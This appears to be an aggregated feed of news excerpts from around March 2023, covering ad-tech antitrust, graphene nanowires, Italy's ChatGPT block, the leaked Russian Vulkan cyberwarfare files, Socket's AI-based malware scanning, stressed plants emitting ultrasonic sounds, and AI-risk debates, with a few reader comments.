When you see an ad online, it’s usually the result of a lightspeed bidding war. On one side, the demand side, you have companies who want to buy ads. On the other, the supply side, are apps and websites who have ad space to sell. Advertisers use demand-side tech to compete for the most profitable ad space for their products. Publishers, like Gizmodo.com, use supply-side tech, where they compete to sell the most profitable ads. Sometimes there’s a third piece of tech involved called an “exchange,” which is a service that connects demand-side platforms and supply-side platforms to arrange even more complicated auctions.
Your friends at Google operate the most popular demand-side platform. Google also owns the most popular supply-side platform, and it runs the most popular exchange. And Google is also a publisher, because it sells ad space on places like YouTube and Search. Meta likewise has its hands in multiple corners of the pie. Here’s an analogy: it’s like if the realtor you contracted to represent you in buying a house had also been contracted by the people selling the house. It would be hard to trust that anyone was getting a fair deal, wouldn’t it? That realtor would be in a unique position to jack up the prices for everyone and make extra cash. The dominance is quantifiable—Google itself estimates that it snatches a stunning 35% of every dollar spent on digital ads.
Some people think this is all a little unfair! Unfortunately for Google and Meta, more and more of those people work for the US government.
DGIST Professor Yoonkyu Lee’s research team used intense light on the surface of a copper wire to synthesize graphene, thereby increasing the production rate and lowering the production cost of the high-quality transparent-flexible electrode materials and consequently enabling its mass production. The results were published in the February 23 issue of Nano Energy.
This technology is applicable to various 2D materials, and its applicability can be extended to the synthesis of various metal-2D material nanowires.
The research team used copper-graphene nanowires to implement high-performance transparent-flexible electronic devices such as transparent-flexible electrodes, transparent supercapacitors and transparent heaters and to thereby demonstrate the commercial viability of this material.
DGIST Professor Yoonkyu Lee said, “We developed a method of mass-producing at a low production cost the next-generation transparent-flexible electrode material based on high-quality copper-graphene nanowires. In the future, we expect that this technology will contribute to the production of core electrode materials for high-performance transparent-flexible electronic devices, semitransparent solar cells, or transparent displays.”
More information: Jongyoun Kim et al, Ultrastable 2D material-wrapped copper nanowires for high-performance flexible and transparent energy devices, Nano Energy (2022). DOI: 10.1016/j.nanoen.2022.108067
Italy’s privacy watchdog said Friday it had blocked the controversial robot ChatGPT, saying the artificial intelligence app did not respect user data and could not verify users’ age.
The decision “with immediate effect” will result in “the temporary limitation of the processing of Italian user data vis-a-vis OpenAI”, the Italian Data Protection Authority said.
The agency has launched an investigation.
[…]
The watchdog said that on March 20, the app experienced a data breach involving user conversations and payment information.
It said there was no legal basis to justify “the mass collection and storage of personal data for the purpose of ‘training’ the algorithms underlying the operation of the platform”.
It also said that since there was no way to verify the age of users, the app “exposes minors to absolutely unsuitable answers compared to their degree of development and awareness.”
It said the company had 20 days to respond how it would address the watchdog’s concerns, under penalty of a 20-million-euro ($21.7-million) fine, or up to 4 percent of annual revenues.
I am pretty sure none of the search engines verify age and store user data (ok duckduckgo is an exception) or give answers that may “expose” the little snowflake “minors to absolutely unsuitable answers compared to their degree of development and awareness.”
There is a race on to catch up to OpenAI and people are obviously losing, so crushing OpenAI is the way to go.
[…] The software engineers behind these systems are employees of NTC Vulkan. On the surface, it looks like a run-of-the-mill cybersecurity consultancy. However, a leak of secret files from the company has exposed its work bolstering Vladimir Putin’s cyberwarfare capabilities.
Thousands of pages of secret documents reveal how Vulkan’s engineers have worked for Russian military and intelligence agencies to support hacking operations, train operatives before attacks on national infrastructure, spread disinformation and control sections of the internet.
The company’s work is linked to the federal security service or FSB, the domestic spy agency; the operational and intelligence divisions of the armed forces, known as the GOU and GRU; and the SVR, Russia’s foreign intelligence organisation.
A diagram showing a Vulkan hacking reconnaissance system codenamed Scan, developed since 2018.
One document links a Vulkan cyber-attack tool with the notorious hacking group Sandworm, which the US government said twice caused blackouts in Ukraine, disrupted the Olympics in South Korea and launched NotPetya, the most economically destructive malware in history. Codenamed Scan-V, it scours the internet for vulnerabilities, which are then stored for use in future cyber-attacks.
Another system, known as Amezit, amounts to a blueprint for surveilling and controlling the internet in regions under Russia’s command, and also enables disinformation via fake social media profiles. A third Vulkan-built system – Crystal-2V – is a training program for cyber-operatives in the methods required to bring down rail, air and sea infrastructure. A file explaining the software states: “The level of secrecy of processed and stored information in the product is ‘Top Secret’.”
The Vulkan files, which date from 2016 to 2021, were leaked by an anonymous whistleblower angered by Russia’s war in Ukraine. Such leaks from Moscow are extremely rare. Days after the invasion in February last year, the source approached the German newspaper Süddeutsche Zeitung and said the GRU and FSB “hide behind” Vulkan.
[…]
Five western intelligence agencies confirmed the Vulkan files appear to be authentic. The company and the Kremlin did not respond to multiple requests for comment.
The leak contains emails, internal documents, project plans, budgets and contracts. They offer insight into the Kremlin’s sweeping efforts in the cyber-realm, at a time when it is pursuing a brutal war against Ukraine. It is not known whether the tools built by Vulkan have been used for real-world attacks, in Ukraine or elsewhere.
[…]
Some documents in the leak contain what appear to be illustrative examples of potential targets. One contains a map showing dots across the US. Another contains the details of a nuclear power station in Switzerland.
A map of the US found in the leaked Vulkan files as part of the multi-faceted Amezit system.
One document shows engineers recommending Russia add to its own capabilities by using hacking tools stolen in 2016 from the US National Security Agency and posted online.
John Hultquist, the vice-president of intelligence analysis at the cybersecurity firm Mandiant, which reviewed selections of the material at the request of the consortium, said: “These documents suggest that Russia sees attacks on civilian critical infrastructure and social media manipulation as one and the same mission, which is essentially an attack on the enemy’s will to fight.”
[…]
One of Vulkan’s most far-reaching projects was carried out with the blessing of the Kremlin’s most infamous unit of cyberwarriors, known as Sandworm. According to US prosecutors and western governments, over the past decade Sandworm has been responsible for hacking operations on an astonishing scale. It has carried out numerous malign acts: political manipulation, cyber-sabotage, election interference, dumping of emails and leaking.
Sandworm disabled Ukraine’s power grid in 2015. The following year it took part in Russia’s brazen operation to derail the US presidential election. Two of its operatives were indicted for distributing emails stolen from Hillary Clinton’s Democrats using a fake persona, Guccifer 2.0. Then in 2017 Sandworm purloined further data in an attempt to influence the outcome of the French presidential vote, the US says.
That same year the unit unleashed the most consequential cyber-attack in history. Operatives used a bespoke piece of malware called NotPetya. Beginning in Ukraine, NotPetya rapidly spread across the globe. It knocked offline shipping firms, hospitals, postal systems and pharmaceutical manufacturers – a digital onslaught that spilled over from the virtual into the physical world.
[…]
Hacking groups such as Sandworm penetrate computer systems by first looking for weak spots. Scan-V supports that process, conducting automated reconnaissance of potential targets around the world in a hunt for potentially vulnerable servers and network devices. The intelligence is then stored in a data repository, giving hackers an automated means of identifying targets.
[…]
One part of Amezit is domestic-facing, allowing operatives to hijack and take control of the internet if unrest breaks out in a Russian region, or the country gains a stronghold over territory in a rival nation state, such as Ukraine. Internet traffic deemed to be politically harmful can be removed before it has a chance to spread.
A 387-page internal document explains how Amezit works. The military needs physical access to hardware, such as mobile phone towers, and to wireless communications. Once they control transmission, traffic can be intercepted. Military spies can identify people browsing the web, see what they are accessing online, and track information that users are sharing.
[…]
the firm developed a bulk collection program for the FSB called Fraction. It combs sites such as Facebook or Odnoklassniki – the Russian equivalent – looking for key words. The aim is to identify potential opposition figures from open source data.
[…]
This Amezit sub-system allows the Russian military to carry out large-scale covert disinformation operations on social media and across the internet, through the creation of accounts that resemble real people online, or avatars. The avatars have names and stolen personal photos, which are then cultivated over months to curate a realistic digital footprint.
The leak contains screenshots of fake Twitter accounts and hashtags used by the Russian military from 2014 until earlier this year. They spread disinformation, including a conspiracy theory about Hillary Clinton and a denial that Russia’s bombing of Syria killed civilians. Following the invasion of Ukraine, one Vulkan-linked fake Twitter account posted: “Excellent leader #Putin”.
A tweet from a fake social media account linked to Vulkan.
Another Vulkan-developed project linked to Amezit is far more threatening. Codenamed Crystal-2V, it is a training platform for Russian cyber-operatives. Capable of allowing simultaneous use by up to 30 trainees, it appears to simulate attacks against a range of essential national infrastructure targets: railway lines, electricity stations, airports, waterways, ports and industrial control systems.
A public challenge could put a temporary stop to the deployment of ChatGPT and similar AI systems. The nonprofit research organization Center for AI and Digital Policy (CAIDP) has filed a complaint with the Federal Trade Commission (FTC) alleging that OpenAI is violating the FTC Act through its releases of large language AI models like GPT-4. That model is “biased, deceptive” and threatens both privacy and public safety, CAIDP claims. Likewise, it supposedly fails to meet Commission guidelines calling for AI to be transparent, fair and easy to explain.
The Center wants the FTC to investigate OpenAI and suspend future releases of large language models until they meet the agency’s guidelines. The researchers want OpenAI to require independent reviews of GPT products and services before they launch. CAIDP also hopes the FTC will create an incident reporting system and formal standards for AI generators.
We’ve asked OpenAI for comment. The FTC has declined to comment. CAIDP president Marc Rotenberg was among those who signed an open letter demanding that OpenAI and other AI researchers pause work for six months to give time for ethics discussions. OpenAI founder Elon Musk also signed the letter.
Critics of ChatGPT, Google Bard and similar models have warned of problematic output, including inaccurate statements, hate speech and bias. Users also can’t repeat results, CAIDP says. The Center points out that OpenAI itself warns AI can “reinforce” ideas whether or not they’re true. While upgrades like GPT-4 are more reliable, there’s a concern people may rely on the AI without double-checking its content.
There’s no guarantee the FTC will act on the complaint. If it does set requirements, though, the move would affect development across the AI industry. Companies would have to wait for assessments, and might face more repercussions if their models fail to meet the Commission’s standards. While this might improve accountability, it could also slow the currently rapid pace of AI development.
Every LLN AI being released right now is pretty clear that it’s not a single source of truth, that mistakes will be made and that you need to check the output yourself. The signing of the letter to stop AI development smacks of people who are so far behind in the race wanting to quietly catch up until the moratorium is lifted and this action sounds a lot like this organisation being in someone’s pocket.
Virgin Orbit’s days of slinging satellites into space aboard aircraft-launched rockets have come to an end Thursday. After six years in business, Virgin’s satellite launch subsidiary has announced via SEC filing that it does not have the funding to continue operations and will be shuttering for “the foreseeable future,” per CNBC. Nearly 90 percent of Virgin Orbit’s employees — 675 people in total — will be laid off immediately.
Virgin Orbit was founded in 2017 for the purpose of developing and commercializing LauncherOne, a satellite launch system fitted under a modified 747 airliner, dubbed Cosmic Girl. The system was designed to put 500 pounds of cubesats into Low Earth Orbit by firing them in a rocket from said airliner flying at an altitude of 30,000 – 50,000 feet. Despite a string of early successes — both in terms of development milestones and expanding service contracts with the UK military, LauncherOne’s first official test in May of 2020 failed to deliver its simulated payload into orbit.
In all, Virgin Orbit made six total flights between 2020 and 2023, only four successfully. The most recent attempt was dubbed the Start Me Up event and was supposed to mark the first commercial space launch from UK soil. Despite the rocket successfully separating from its parent aircraft, an upper stage “anomaly” prevented the rocket’s payload from entering orbit. It was later determined that a $100 fuel filter had failed and resulted in the fault.
As TechCrunch points out, Virgin Group founder, Sir Richard Branson, “threw upwards of $55 million to the sinking space company,” in recent months but Start Me Up’s embarrassing failure turned out to be the final straw. On March 16th, Virgin Orbit announced an “operational pause” and worker furlough for its roughly 750 employees as company leadership scrambled to find new funding sources. The company extended the furlough two weeks later and called it quits on Thursday.
“Unfortunately, we’ve not been able to secure the funding to provide a clear path for this company,” Virgin CEO Dan Hart said in an all-hands call obtained by CNBC. “We have no choice but to implement immediate, dramatic and extremely painful changes.”
Impacted employees will reportedly receive severance packages, according to Hart, including a cash payment, continued benefits and a “direct pipeline” to Virgin Galactic’s hiring department. Virgin Orbit’s two top executives will also receive “golden parachute” severances which were approved by the company’s board, conveniently, back in mid-March right when the furloughs first took effect.
Several months ago, Socket, which makes a freemium security scanner for JavaScript and Python projects, connected OpenAI’s ChatGPT model (and more recently its GPT-4 model) to its internal threat feed.
The results, according to CEO Feross Aboukhadijeh, were surprisingly good. “It worked way better than expected,” he told The Register in an email. “Now I’m sitting on a couple hundred vulnerabilities and malware packages and we’re rushing to report them as quick as we can.”
Socket’s scanner was designed to detect supply chain attacks. Available as a GitHub app or a command line tool, it scans JavaScript and Python projects in an effort to determine whether any of the many packages that may have been imported from the npm or PyPI registries contain malicious code.
Aboukhadijeh said Socket has confirmed 227 vulnerabilities, all using ChatGPT. The vulnerabilities fall into different categories and don’t share common characteristics.
The Register was provided with numerous examples of published packages that exhibited malicious behavior or unsafe practices, including: information exfiltration, SQL injection, hardcoded credentials, potential privilege escalation, and backdoors.
We were asked not to share several examples as they have yet to be removed, but here’s one that has already been dealt with.
mathjs-min“Socket reported this to npm and it has been removed,” said Aboukhadijeh. “This was a pretty nasty one.”
AI analysis: “The script contains a discord token grabber function which is a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”
“There are some interesting effects as well, such as things that a human might be persuaded of but the AI is marking as a risk,” Aboukhadijeh added.
“These decisions are somewhat subjective, but the AI is not dissuaded by comments claiming that a dangerous piece of code is not malicious in nature. The AI even includes a humorous comment indicating that it doesn’t trust the inline comment.”
Example trello-enterprise
AI analysis: “The script collects information like hostname, username, home directory, and current working directory and sends it to a remote server. While the author claims it is for bug bounty purposes, this behavior can still pose a privacy risk. The script also contains a blocking operation that can cause performance issues or unresponsiveness.”
Aboukhadijeh explained that the software packages at these registries are vast and it’s difficult to craft rules that thoroughly plumb the nuances of every file, script, and bit of configuration data. Rules tend to be fragile and often produce too much detail or miss things a savvy human reviewer would catch.
Applying human analysis to the entire corpus of a package registry (~1.3 million for npm and ~450,000 for PyPI) just isn’t feasible, but machine learning models can pick up some of the slack by helping human reviewers focus on the more dubious code modules.
“Socket is analyzing every npm and PyPI package with AI-based source code analysis using ChatGPT,” said Aboukhadijeh.
“When it finds something problematic in a package, we flag it for review and ask ChatGPT to briefly explain its findings. Like all AI-based tooling, this may produce some false positives, and we are not enabling this as a blocking issue until we gather more feedback on the feature.”
Aboukhadijeh provided The Register with a sample report from its ChatGPT helper that identifies risky, though not conclusively malicious behavior. In this instance, the machine learning model offered this assessment, “This script collects sensitive information about the user’s system, including username, hostname, DNS servers, and package information, and sends it to an external server.”
Screenshot of ChatGPT report for Socket security scanner – Click to enlarge
What a ChatGPT-based Socket advisory looks like … Click to enlarge
According to Aboukhadijeh, Socket was designed to help developers make informed decisions about risk in a way that doesn’t interfere with their work. So raising the alarm about every install script – a common attack vector – can create too much noise. Analysis of these scripts using a large language model dials the alarm bell down and helps developers recognize real problems. And these models are becoming more capable.
What does a stressed plant sound like? A bit like bubble-wrap being popped. Researchers in Israel report in the journal Cell on March 30 that tomato and tobacco plants that are stressed—from dehydration or having their stems severed—emit sounds that are comparable in volume to normal human conversation. The frequency of these noises is too high for our ears to detect, but they can probably be heard by insects, other mammals, and possibly other plants.
“Even in a quiet field, there are actually sounds that we don’t hear, and those sounds carry information,” says senior author Lilach Hadany, an evolutionary biologist and theoretician at Tel Aviv University. “There are animals that can hear these sounds, so there is the possibility that a lot of acoustic interaction is occurring.”
Although ultrasonic vibrations have been recorded from plants before, this is the first evidence that they are airborne, a fact that makes them more relevant for other organisms in the environment. “Plants interact with insects and other animals all the time, and many of these organisms use sound for communication, so it would be very suboptimal for plants to not use sound at all,” says Hadany.
The researchers used microphones to record healthy and stressed tomato and tobacco plants, first in a soundproofed acoustic chamber and then in a noisier greenhouse environment. They stressed the plants via two methods: by not watering them for several days and by cutting their stems. After recording the plants, the researchers trained a machine-learning algorithm to differentiate between unstressed plants, thirsty plants, and cut plants.
The team found that stressed plants emit more sounds than unstressed plants. The plant sounds resemble pops or clicks, and a single stressed plant emits around 30–50 of these clicks per hour at seemingly random intervals, but unstressed plants emit far fewer sounds. “When tomatoes are not stressed at all, they are very quiet,” says Hadany.
00:00
00:36
An audio recording of plant sounds. The frequency was lowered so that it is audible to human ears. Credit: Khait et al.
Water-stressed plants began emitting noises before they were visibly dehydrated, and the frequency of sounds peaked after five days with no water before decreasing again as the plants dried up completely. The types of sound emitted differed with the cause of stress. The machine-learning algorithm was able to accurately differentiate between dehydration and stress from cutting and could also discern whether the sounds came from a tomato or tobacco plant.
Although the study focused on tomato and tobacco plants because of their ease to grow and standardize in the laboratory, the research team also recorded a variety of other plant species. “We found that many plants—corn, wheat, grape, and cactus plants, for example—emit sounds when they are stressed,” says Hadany.
A photo of a cactus being recorded. Credit: Itzhak Khait
The exact mechanism behind these noises is unclear, but the researchers suggest that it might be due to the formation and bursting of air bubbles in the plant’s vascular system, a process called cavitation.
Whether or not the plants are producing these sounds in order to communicate with other organisms is also unclear, but the fact that these sounds exist has big ecological and evolutionary implications. “It’s possible that other organisms could have evolved to hear and respond to these sounds,” says Hadany. “For example, a moth that intends to lay eggs on a plant or an animal that intends to eat a plant could use the sounds to help guide their decision.”
Other plants could also be listening in and benefiting from the sounds. We know from previous research that plants can respond to sounds and vibrations: Hadany and several other members of the team previously showed that plants increase the concentration of sugar in their nectar when they “hear” the sounds made by pollinators, and other studies have shown that plants change their gene expression in response to sounds. “If other plants have information about stress before it actually occurs, they could prepare,” says Hadany.
An illustration of a dehydrated tomato plant being recorded using a microphone. Credit: Liana Wait
Sound recordings of plants could be used in agricultural irrigation systems to monitor crop hydration status and help distribute water more efficiently, the authors say.
“We know that there’s a lot of ultrasound out there—every time you use a microphone, you find that a lot of stuff produces sounds that we humans cannot hear—but the fact that plants are making these sounds opens a whole new avenue of opportunities for communication, eavesdropping, and exploitation of these sounds,” says co-senior author Yossi Yovel, a neuro-ecologist at Tel Aviv University.
“So now that we know that plants do emit sounds, the next question is—’who might be listening?'” says Hadany. “We are currently investigating the responses of other organisms, both animals and plants, to these sounds, and we’re also exploring our ability to identify and interpret the sounds in completely natural environments.”
This is not a newly discovered phenomenon, plants, grasses and trees are very good at detecting and warning, eg
Stressed plants show altered phenotypes, including changes in color, smell, and shape. Yet, the possibility that plants emit airborne sounds when stressed – similarly to many animals – has not been investigated. Here we show, to our knowledge for the first time, that stressed plants emit airborne sounds that can be recorded remotely, both in acoustic chambers and in greenhouses. We recorded ∼65 dBSPL ultrasonic sounds 10 cm from tomato and tobacco plants, implying that these sounds could be detected by some organisms from up to several meters away. We developed machine learning models that were capable of distinguishing between plant sounds and general noises, and identifying the condition of the plants – dry, cut, or intact – based solely on the emitted sounds. Our results suggest that animals, humans, and possibly even other plants, could use sounds emitted by a plant to gain information about the plant’s condition. More investigation on plant bioacoustics in general and on sound emission in plants in particular may open new avenues for understanding plants and their interactions with the environment, and it may also have a significant impact on agriculture.
Source: Plants emit informative airborne sounds under stress
The remarkable ability of plants to respond to their environment has led some scientists to believe it’s a sign of conscious awareness. A new opinion paper argues against this position, saying plants “neither possess nor require consciousness.”
To explain these apparent behaviors, a subset of scientists known as plant neurobiologists has argued that plants possess a form of consciousness. Most notably, evolutionary ecologist Monica Gagliano has performed experiments that allegedly hint at capacities such as habituation (learning from experience) and classical conditioning (like Pavlov’s salivating dogs). In these experiments, plants apparently “learned” to stop curling their leaves after being dropped repeatedly or to spread their leaves in anticipation of a light source. Armed with this experimental evidence, Gagliano and others have claimed, quite controversially, that because plants can learn and exhibit other forms of intelligence, they must be conscious.
Nonsense, argues a new paper published today in Trends in Plant Science. The lead author of the new paper, biologist Lincoln Taiz from the University of California at Santa Cruz, isn’t denying plant intelligence, but makes a strong case against their being conscious.
Ultrasonic acoustic emission (UAE) in trees is often related to collapsing water columns in the flow path as a result of tensions that are too strong (cavitation). However, in a decibel (dB) range below that associated with cavitation, a close relationship was found between UAE intensities and stem radius changes.
UAE was continuously recorded on the stems of mature field-grown trees of Scots pine (Pinus sylvestris) and pubescent oak (Quercus pubescens) at a dry inner-Alpine site in Switzerland over two seasons. The averaged 20-Hz records were related to microclimatic conditions in air and soil, sap-flow rates and stem-radius fluctuations de-trended for growth (ΔW).•
Within a low-dB range (27 ± 1 dB), UAE regularly increased and decreased in a diurnal rhythm in parallel with ΔW on cloudy days and at night. These low-dB emissions were interrupted by UAE abruptly switching between the low-dB range and a high-dB range (36 ± 1 dB) on clear, sunny days, corresponding to the widely supported interpretation of UAE as sound from cavitations.•
It is hypothesized that the low-dB signals in drought-stressed trees are caused by respiration and/or cambial growth as these physiological activities are tissue water-content dependent and have been shown to produce courses of CO2 efflux similar to our courses of ΔW and low-dB UAE.
Earlier today, more than 1,100 artificial intelligence experts, industry leaders and researchers signed a petition calling on AI developers to stop training models more powerful than OpenAI’s ChatGPT-4 for at least six months. Among those who refrained from signing it was Eliezer Yudkowsky, a decision theorist from the U.S. and lead researcher at the Machine Intelligence Research Institute. He’s been working on aligning Artificial General Intelligence since 2001 and is widely regarded as a founder of the field.
“This 6-month moratorium would be better than no moratorium,” writes Yudkowsky in an opinion piece for Time Magazine. “I refrained from signing because I think the letter is understating the seriousness of the situation and asking for too little to solve it.” Yudkowsky cranks up the rhetoric to 100, writing: “If somebody builds a too-powerful AI, under present conditions, I expect that every single member of the human species and all biological life on Earth dies shortly thereafter.” Here’s an excerpt from his piece: The key issue is not “human-competitive” intelligence (as the open letter puts it); it’s what happens after AI gets to smarter-than-human intelligence. Key thresholds there may not be obvious, we definitely can’t calculate in advance what happens when, and it currently seems imaginable that a research lab would cross critical lines without noticing. […] It’s not that you can’t, in principle, survive creating something much smarter than you; it’s that it would require precision and preparation and new scientific insights, and probably not having AI systems composed of giant inscrutable arrays of fractional numbers. […]
It took more than 60 years between when the notion of Artificial Intelligence was first proposed and studied, and for us to reach today’s capabilities. Solving safety of superhuman intelligence — not perfect safety, safety in the sense of “not killing literally everyone” — could very reasonably take at least half that long. And the thing about trying this with superhuman intelligence is that if you get that wrong on the first try, you do not get to learn from your mistakes, because you are dead. Humanity does not learn from the mistake and dust itself off and try again, as in other challenges we’ve overcome in our history, because we are all gone.
Trying to get anything right on the first really critical try is an extraordinary ask, in science and in engineering. We are not coming in with anything like the approach that would be required to do it successfully. If we held anything in the nascent field of Artificial General Intelligence to the lesser standards of engineering rigor that apply to a bridge meant to carry a couple of thousand cars, the entire field would be shut down tomorrow. We are not prepared. We are not on course to be prepared in any reasonable time window. There is no plan. Progress in AI capabilities is running vastly, vastly ahead of progress in AI alignment or even progress in understanding what the hell is going on inside those systems. If we actually do this, we are all going to die. You can read the full letter signed by AI leaders here.
The successor to the Recon Instruments Mod Live is here – the Rekkie AR ski goggles. They use a screen which reflects onto the plastic transparent goggle plate, so you can buy different types of lenses. The system shows maps, compass, speed, etc and is controlled by a large box on the strap which connects to the helmet, so in that respect not quite as elegant as the bluetooth remote of the Recon Mod system. The price is not bad at all at $349,-
